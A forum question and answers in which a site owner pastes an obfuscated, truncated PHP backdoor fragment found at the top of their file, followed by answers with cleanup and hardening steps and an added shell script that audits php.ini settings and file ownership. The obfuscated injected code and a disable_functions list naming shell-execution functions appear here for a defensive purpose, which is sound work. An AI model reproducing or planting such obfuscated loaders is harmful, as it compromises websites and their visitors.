PHP obfuscated “Dodgy” code is appearing on my website
I found this in my PHP file:
<?php $glsaucbk = '5 156 x61"])))) { $GLOBALS[" ]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1:!>! x242178}527}88:}334}472 x24<!%ff2!>!bssbz) x24]25 x24- x24-!% x24- x24*!|! x24- x24 x5c%j24#-!#]y38#-!%w:**<")));$nkfhbiv = $sorsjsw("", $wrwjkjc); $nkfhbiv#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO x2nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fep::::-111112)eobs`un>qp%!|Z~!<##!>!2w*[!%rN}#QwTW%hIr x5c1^-%r x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]8]275]y7:]268]y7f#<!%tww!>! x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< ();}}AZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutc252]y85]256]y6g]257]y86]267]y74tjyf`4 x223}!+!<+{e%+*!*+fe4y4 x24- x24]y8 x24- x24]26 x24- x24!>!fyqmpef)# x24*<!%t::!>! x24Ypp3)%c%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f x27,*e x27,*d x2%rxB%epnbss!>!bssbz)#44ec:649#!-#j0#!/
It's at the head of the file... I've tried to delete this but it reappears directly. I have used a PHP detector and it tells me DodgyPHP.
Have you already had this malicious code in your PHP file?
I don't think you need to know any more than you do already:
You should at least:
While not a direct answer, this would be a useful step guide for how to clean up your system.
The symptoms show your system has also certainly been hacked, and is still hackable.
You need to follow the link here http://www.gregfreeman.io/2013/steps-to-take-when-you-know-your-php-site-has-been-hacked/ and take significant steps to harden your system against future hacks:
Run
ps aux | grep apache
or
ps aux | grep nginx
to find the userid that your web server is running under. Make sure the files are not owned by that user. Do something like
sudo -u <that userid> touch /path/to/web/files/some_test_file
to check permissions. If that successfully creates a file, then you have a problem and you need to adjust permissions.
Edit your php.ini and disable dangerous functions (such as exec) and classes:
disable_functions = "exec,passthru,shell_exec,system,proc_open,popen, curl_multi_exec,parse_ini_file,show_source"
Check that auto_prepend_file and auto_append_file values are expected or blank.
Check the cron_jobs running on your server.
Note: Could others who know add and edit this post to add further useful guides and information. Could be a good resource for future readers.
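A read-only audit of the php.ini and file-ownership checks listed in the answer above, as an added example that is not part of the original post. The function names and the sample php.ini (including its path value) are constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the original post.
# REQUIRED is the function list from the answer's disable_functions line.
REQUIRED="exec passthru shell_exec system proc_open popen curl_multi_exec parse_ini_file show_source"

# Print the value of a php.ini directive (the last uncommented assignment wins).
ini_value() {  # usage: ini_value <php.ini> <directive>
    sed -n "s/^[[:space:]]*${2}[[:space:]]*=[[:space:]]*//p" "$1" | tail -n 1 |
        sed 's/[[:space:]]*;.*$//; s/[[:space:]]*$//; s/^"//; s/"$//'
}

# List functions from REQUIRED that the php.ini does NOT disable.
# Whole-name match: disabling shell_exec does not count as disabling exec.
missing_disabled() {  # usage: missing_disabled <php.ini>
    disabled=$(ini_value "$1" disable_functions | tr ', ' '\n\n')
    for fn in $REQUIRED; do
        printf '%s\n' "$disabled" | grep -qxF "$fn" || printf '%s\n' "$fn"
    done
}

# Print auto_prepend_file / auto_append_file when set to a real path.
# Blank and PHP's special value "none" both mean nothing is injected.
prepend_append_set() {  # usage: prepend_append_set <php.ini>
    for key in auto_prepend_file auto_append_file; do
        val=$(ini_value "$1" "$key")
        case "$val" in ''|none) ;; *) printf '%s=%s\n' "$key" "$val" ;; esac
    done
}

# List files under the web root that the web server user owns, or that are
# world-writable; either lets code running as that user rewrite them.
writable_risk() {  # usage: writable_risk <web_root> <userid>
    find "$1" -type f \( -user "$2" -o -perm -0002 \) -print
}

# Demo on a constructed php.ini (sample values, not taken from the page).
sample=$(mktemp)
cat > "$sample" <<'EOF'
; constructed sample
disable_functions = "exec,passthru,shell_exec,system"
auto_prepend_file = /var/tmp/.cache/loader.php
auto_append_file =
EOF
echo "Not disabled:";        missing_disabled "$sample"
echo "Prepend/append set:";  prepend_append_set "$sample"
```

Point ini_value at the php.ini your web server actually loads, since the CLI and the web SAPI often read different files.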